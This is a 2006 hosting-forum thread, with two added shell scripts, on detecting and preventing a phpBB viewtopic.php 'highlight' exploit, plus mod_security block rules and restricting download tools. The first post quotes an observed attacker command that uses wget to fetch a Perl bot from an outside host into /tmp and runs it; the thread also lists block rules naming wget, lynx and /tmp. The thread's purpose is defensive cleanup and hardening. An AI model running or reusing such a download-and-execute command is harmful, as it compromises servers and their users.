How to prevent hackers from using your resources through phpBB?

Discussion in 'General Discussion' started by jameshsi, Jul 4, 2006.

  1. jameshsi

    Hi!
    I am not a pro on this, but it seems there is no thread mentioning how to update your phpBB scripts on your server, so I am writing down what I know to solve this problem.

    First, if you are not sure whether your server has been hacked, go to /tmp and see if there are some .xxx files. Please note, in my experience, it is always something like ".xyz", for example ".sosweet". Or you can do this:
    ps ax |more
    If you see some process that looks strange or odd, in my case like usbd, or like this:
    Code:
    sh -c wget http://66.90.71.157/~darkcube/linuxdaybot.txt -O /tmp/.sosweet2; perl /tmp/.sosweet2; touch /tmp/.sosweet3
    
    Then you had better check whether your server has some phpBB running, and check its version.
    For how to do that, please check some other thread; what I want to say here is how to modify the phpBB script so you can prevent this shit from happening again.

    Now, under the phpBB install directory, find "viewtopic.php" and edit it. Find this line:
    Code:
    $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight'])))); 
    and replace it with:
    Code:
    $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight']))); 
    That's it, you are almost done.
    Then go to /tmp and delete those hackers' files, and restart something.
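
The checks described in the post above, collected into one triage script. This is an added example, not part of the original post: the function names, the temp-directory list, the `/home` search root and the sample `ps` lines (with the documentation address 203.0.113.10) are assumptions made for illustration.

```bash
#!/bin/sh
# Added example: triage for the signs described in the post above.

# Hidden regular files directly under a temp dir (default /tmp).
# -type f skips the usual hidden socket directories such as .ICE-unix.
find_hidden_tmp_files() {
    find "${1:-/tmp}" -maxdepth 1 -type f -name '.*' 2>/dev/null | sort
}

# Filter `ps` output on stdin: a downloader writing into a temp dir, or an
# interpreter running a script that lives in one.
flag_suspicious_procs() {
    grep -E '(wget|curl|fetch|lynx)[^;|&]*[[:space:]](-O|-o|>)[[:space:]]*/(tmp|var/tmp|dev/shm)/|(perl|sh|bash|python|php)[[:space:]]+/(tmp|var/tmp|dev/shm)/' || true
}

# viewtopic.php copies under a tree that still contain the unpatched line.
find_unpatched_viewtopic() {
    find "${1:-/home}" -type f -name viewtopic.php 2>/dev/null |
    while IFS= read -r f; do
        if grep -qF "urldecode(\$HTTP_GET_VARS['highlight'])" "$f"; then
            echo "$f"
        fi
    done | sort
}

# Constructed sample of `ps ax` output; 203.0.113.10 is a documentation address.
sample_ps() {
cat <<'EOF'
  812 ?  Ss  0:00 /usr/sbin/sshd
 4021 ?  S   0:00 sh -c wget http://203.0.113.10/bot.txt -O /tmp/.sosweet2; perl /tmp/.sosweet2
 4090 ?  S   0:02 /usr/local/apache/bin/httpd -DSSL
 4177 ?  S   0:00 perl /tmp/.sosweet2
EOF
}

if [ "${1:-}" = "--live" ]; then
    find_hidden_tmp_files /tmp          # assumed temp dir
    ps axww | flag_suspicious_procs
    find_unpatched_viewtopic /home      # assumed account root
else
    sample_ps | flag_suspicious_procs   # demo on the constructed sample
fi
```

Run without arguments it only filters the constructed sample; `--live` inspects the host it runs on and changes nothing.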
     
  2. Infopro

    You forgot one step.

    Remove phpbb and find a better forum. :eek:
     
  3. chirpy

    Indeed. Patching something that is terminally broken is pointless. You should either upgrade to the very latest version (though the past has shown that only helps for a few weeks) or do as Infopro says, look for something that's been coded better.
     
  4. jameshsi

    Hi!
    Yes, you guys are right, but also wrong.
    For the long term, one should upgrade or transfer to another forum system, that's right, but people like me have to deal with the hacker right this moment and have no time to study how to migrate to another forum; you have to fix the current hole.
     
  5. sitekeeper

    I think the point chirpy was trying to make is that you will always be "fixing the current hole".
    You need to buy VB or Invision Power Board, or you could always lease Invision Power Board for $69.95 or VB for $85. It would be well worth your time.
     
  6. ramprage

    You need to limit access to your system binaries which would have avoided the exploit in the first place. For example:

    Lock access to common tools like:
    ftp, wget, get, lynx, fetch, curl, and others like compilers.
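
One way to audit the binaries named in the post above before restricting them. This is an added example, not part of the original post: the `GET`, `gcc` and `cc` entries, the directories scanned and the `chmod 750` mode are assumptions, and the script only prints the commands it would suggest.

```bash
#!/bin/sh
# Added example: audit (and plan, not apply) restrictions on fetch/compile tools.

# Names from the post; GET, gcc and cc are assumptions standing in for the
# LWP "get" tool and for "compilers".
TOOLS="ftp wget get GET lynx fetch curl gcc cc"

# Print every listed tool in the given directories that "other" may execute.
world_exec_tools() {
    for dir in "$@"; do
        for tool in $TOOLS; do
            f="$dir/$tool"
            [ -f "$f" ] || continue
            # -L follows symlinks; -perm -001: execute bit for "other" is set
            [ -n "$(find -L "$f" -maxdepth 0 -perm -001 2>/dev/null)" ] && echo "$f"
        done
    done
    return 0
}

# Emit the chmod commands for review instead of running them.
# Mode 750 (owner and group only) is an assumed choice.
lockdown_plan() {
    world_exec_tools "$@" | while IFS= read -r f; do
        echo "chmod 750 $f"
    done
}

lockdown_plan /usr/bin /usr/local/bin   # assumed install directories
```

Restricting these binaries does not affect downloads performed by PHP or Perl code itself, so it complements the script fix rather than replacing it.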
     
  7. HostMerit

    Mod Security.

    There is no substitute.

    http://www.hostmerit.com/modsec.rules.conf

    Those are my widely used self-coded mod security rules.

    Also for rubbish bots like this:

    SecFilter "linuxday"
    SecFilter "\/tmp"
    SecFilter "wget"
    SecFilter "lynx\x20"
    SecFilter "GET\x20"
    SecFilter "sosweet"
     
  8. ramprage

    That URL gives the following only:

    hif


    I think the URL you meant was: http://www.hostmerit.com/modsec.user.conf ;)

    Anyways, setting up mod_security is a must, but there are ways around it if you don't match the rule, so it's a very good idea to limit access to important binaries that can do harm.
     
    #8 ramprage, Jul 5, 2006
    Last edited: Jul 5, 2006
  9. chirpy

    Also, mod_security is security through obscurity to some extent. It's a good tool for detecting vulnerabilities, but you really should not purely rely on it as a shield. It's much much better to get rid of the offending shoddy scripts rather than trying to protect them.
     
  10. mher

    I tried using the ruleset for mod_security but it seems WHM will not allow long rulesets. How can I fix this?
     
  11. NightStorm

    Manually edit /usr/local/apache/conf/modsec.user.conf
     
  12. mike25

    Nice ruleset, that puts mine to shame. Thanks Kris.
     
  13. docenta

    Hello, are these mod_sec rules from hostmerit tested and good? I am now using the security rules from theplanet web site. Which one is better/tested?

    Thanks.
     
  14. avijit

    This mod_sec ruleset definitely looks good and seems to work well.
     
  15. jameshsi
